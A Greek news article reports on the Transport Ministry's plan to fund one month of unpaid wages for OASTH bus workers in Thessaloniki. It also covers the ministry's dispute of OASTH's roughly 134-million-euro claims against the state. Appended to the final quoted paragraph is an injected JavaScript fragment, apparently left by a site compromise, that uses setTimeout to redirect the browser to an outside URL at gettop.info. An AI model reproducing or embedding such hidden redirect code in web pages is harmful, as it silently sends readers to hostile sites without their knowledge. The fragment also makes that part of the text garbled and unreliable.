Υπ. Μεταφορών: 3 εκατ. € για να πληρωθούν οι εργαζόμενοι στον ΟΑΣΘ

0
8

 

Σε συνεργασία με το υπουργείο Οικονομικών, το υπουργείο Μεταφορών  θα καταβάλουν έναν μήνα δεδουλευμένων των εργαζομένων στον ΟΑΣΘ. Το ΥΠΟΜΕΔΙ αναζητεί άμεση λύση, προκειμένου τα χρήματα να μην δεσμευτούν λόγω των φορολογικών και άλλων εκκρεμοτήτων του ΟΑΣΘ και να δοθούν στους εργαζομένους.

Με ανακοίνωσή του, θα κατατεθούν 2 εκατ. ευρώ από το υπουργείο Παιδείας και 1 εκατ. ευρώ από το υπουργείο Εργασίας, ενώ ταυτόχρονα φορείς της Θεσσαλονίκης καλούνται να καταθέσουν προτάσεις για την οριστική επίλυση του προβλήματος.

Επίσης, δόθηκε εντολή στο ΣΕΕΥΜΕ, (Σώμα Επιθεωρητών Ελεγκτών Υπουργείου Μεταφορών Επικοινωνιών), μετά την εκταμίευση του ποσού, να ελεγχθεί, ότι όλα τα χρήματα κατατέθηκαν στους εργαζομένους του ΟΑΣΘ, ώστε να καταβληθεί το ποσό του δεύτερου μήνα δεδουλευμένων και να αποδοθούν στα αρμόδια Υπουργεία οι μισθοδοσίες των εργαζομένων του ΟΑΣΘ.

Σε ό,τι αφορά, τα « απαράδεκτα αιτήματα του ΟΑΣΘ για δήθεν οφειλές«, το υπουργείο υποστηρίζει πως ο Οργανισμός διεκδικεί «χωρίς επαρκή τεκμηρίωση» από το δημόσιο σχεδόν 134 εκατομμύρια ευρώ, «δείχνοντας και τον πραγματικό στόχο όσων διαδραματίζονται».

Αναλυτικά, σύμφωνα με την ανακοίνωση του υπουργείου, οι διεκδικήσεις:

«Ποσό ύψους 17.734.901,62 εκατ. ευρώ, από το Υπουργείο Παιδείας – Έρευνας και Θρησκευμάτων, χωρίς στοιχεία και τεκμηρίωση

Ποσό ύψους 9.457.885,12 εκατ. ευρώ, από το υπουργείο Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης, χωρίς στοιχεία και τεκμηρίωση

Ποσό ύψους 3.367.847,93 εκατ. ευρώ, από το υπουργείο Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης, χωρίς στοιχεία και τεκμηρίωση

Ποσό ύψους 1.493.925,17 εκατ. ευρώ, από το υπουργείο Εργασίας, Κοινωνικής Ασφάλισης και Κοινωνικής Αλληλεγγύης, χωρίς στοιχεία και τεκμηρίωση, ως εξόφληση για το 2014

Ποσό ύψους 17.198.657,71 εκατ. ευρώ, με δικούς τους υπολογισμούς ως ΦΠΑ

Ποσό ύψους 50.000.000 εκατ. ευρώ, πάντα χωρίς στοιχεία, για τη δήθεν ελεύθερη μετακίνηση ανέργων

Ποσό ύψους 15.655.952, 98 εκατ. ευρώ, για το 2014, ως εκκρεμότητα της γνωστής διαδικασίας διαιτησίας του ΟΑΣΘ

Αναφέρεται, επίσης, ότι στο πρώτο τρίμηνο του 2017 οφείλει το Ελληνικό Δημόσιο 19.079.520,19 εκατ. ευρώ.

Συνολικά διεκδικεί, με την ευκαιρία του προβλήματος καταβολής των δεδουλευμένων των εργαζομένων, 133.988.690,72 εκατ. ευρώ«.

Σύμφωνα με την πάγια τακτική του ΟΑΣΘ, τα χρήματα αυτά θα διεκδικηθούν μέσω διαιτησίας, όπως γίνεται από το 1957, και θα τα πληρώσει ο ελληνικός λαός σημειώνεται στην ανακοίνωση του υπυοργείου Μεταφορών.

«Μας υπενθυμίζουν ότι μάς έστειλαν τον λογαριασμό μισθοδοσίας της Εθνικής Τράπεζας, για να καταβάλουμε εκεί ΠΡΟΚΑΤΑΒΟΛΙΚΑ τα χρωστούμενα δεδουλευμένα του ΟΑΣΘ. Και όχι του υπουργείου.

Αρνείται να εκδόσει εγγυητική επιστολή, για να λάβει ΠΡΟΚΑΤΑΒΟΛΙΚΑ όλα τα δεδουλευμένα

Αρνείται να δώσει κατάσταση μισθοδοσίας για τον εκ των υστέρων έλεγχο, για τον ένα μήνα χρωστούμενων δεδουλευμένων του ΟΑΣΘ, προκειμένου να καταβληθεί και ο δεύτερος.

Σημειώνουμε ότι, σύμφωνα με τη σύμβαση και τους ισχύοντες νόμους, οι προκαταβολικές μηνιαίες δόσεις χωρίς διασφαλίσεις είναι παράνομες. Το γνωρίζει και η διοίκηση του ΟΑΣΘ και ο Πρόεδρος του σωματείου εργαζομένων.

Σημειώνουμε επίσης ότι στις μηνιαίες καταβολές του ελληνικού δημοσίου προς τον ΟΑΣΘ εμπεριέχεται το κέρδος των μετόχων.

Ολοι μπορούν να βγάλουν τα συμπεράσματά τους και για τη διοίκηση του ΟΑΣΘ και για τους εκπροσώπους των εργαζομένων του ΟΑΣΘ«.

Και επίσης σημειώνεται: «Ας πάρουν όλοι τις δικές τους ευθύνες για τη συνέχιση ή μη 60 χρόνων εκβιασμού του λαού της Θεσσαλονίκης και την κατασπατάληση των χρημάτων του ελληνικού λαού«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here